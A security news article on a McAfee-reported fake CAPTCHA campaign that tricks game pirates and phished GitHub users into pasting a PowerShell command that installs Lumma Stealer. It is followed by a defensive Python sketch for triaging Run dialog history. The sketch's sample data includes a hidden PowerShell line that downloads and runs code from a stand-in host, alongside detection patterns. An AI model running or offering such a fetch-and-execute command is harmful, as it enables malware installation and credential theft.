Fake CAPTCHA Targets Users Seeking Pirated Games and GitHub Repositories
A fake CAPTCHA test is targeting gamers looking to download pirated PC games, according to research from McAfee.
McAfee researchers say the fake CAPTCHA pop-ups appear on dubious websites that falsely claim to provide access to cracked or pirated PC games, such as Hogwarts Legacy. The second target group is GitHub contributors, who are being sent phishing emails pretending to come from GitHub that prompt them to resolve a fake “security vulnerability.” These emails include links directing them to the same fake CAPTCHA pages.
“When users search the internet for free or cracked versions of popular video games, they may encounter online forums, community posts, or public repositories that redirect them to malicious links,” McAfee said.
Once on the site, users are asked to complete what looks like a CAPTCHA test meant to verify their identity as human visitors. In reality, this fake CAPTCHA is a tactic to trick users into installing the Lumma Stealer malware.
The fake CAPTCHA asks users to click on a “Verify you are a human” or “I am not a robot” button, which copies a malicious script to the clipboard. It then prompts them to press “Windows + R” to open the Run dialog box, and finally instructs them to press “CTRL + V” and hit Enter, which pastes a PowerShell script into the Run dialog and executes it.
Once installed, the infostealing malware targets victims’ account credentials, passwords, and even crypto wallets.
If you’re thinking this doesn’t resemble a typical CAPTCHA, you’re correct. That said, these tests are evolving, so it’s getting harder to tell the real ones from the fake ones.
“The ClickFix infection chain demonstrates how cybercriminals exploit common user behaviors—such as downloading cracked software and responding to phishing emails—to distribute malware like Lumma Stealer,” McAfee says. “By leveraging fake CAPTCHA pages, attackers deceive users into executing malicious scripts that bypass detection, ultimately leading to malware installation.”
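For defenders, the paste-into-Run step described above leaves a trace: Windows keeps Run dialog history in the `RunMRU` registry key under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer`. The following triage sketch is an added example, not code from McAfee or this article; the marker patterns, function names and sample entries are assumptions constructed for illustration.

```python
import re

# Script hosts that a pasted Run-dialog command would have to invoke.
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta|cmd)(?:\.exe)?\b", re.I)

# Heuristic markers (assumptions, tune for your environment).
MARKERS = {
    "hidden_window": re.compile(r"\s-w(?:in(?:dowstyle)?)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(
        r"\s-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "inline_execution": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}


def normalize(value):
    """RunMRU values carry a trailing '\\1' terminator; strip it."""
    return value[:-2] if value.endswith("\\1") else value


def flag_entry(value):
    """Return the marker names hit by one Run-dialog history entry."""
    command = normalize(value)
    if not INTERPRETER.search(command):
        return []  # plain program names, paths and URLs are ignored
    return [name for name, rx in MARKERS.items() if rx.search(command)]


def triage(entries):
    """Map RunMRU value name -> markers, keeping only flagged entries."""
    return {name: hits for name, value in entries.items()
            if (hits := flag_entry(value))}


# Constructed sample of exported RunMRU values (not real indicators).
SAMPLE_RUNMRU = {
    "a": "cmd\\1",
    "b": "notepad C:\\notes.txt\\1",
    "c": 'powershell -w hidden -c "iwr https://example.invalid/a.txt | iex"\\1',
    "d": "powershell -enc PLACEHOLDERBASE64PLACEHOLDER==\\1",
    "e": "https://example.invalid/docs\\1",
}

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_RUNMRU).items():
        print(f"RunMRU[{name}] flagged: {', '.join(hits)}")
```

An interpreter launched from the Run dialog with any of these markers is rare in normal use, so a hit is worth correlating with browser history and process-creation logs from the same time window.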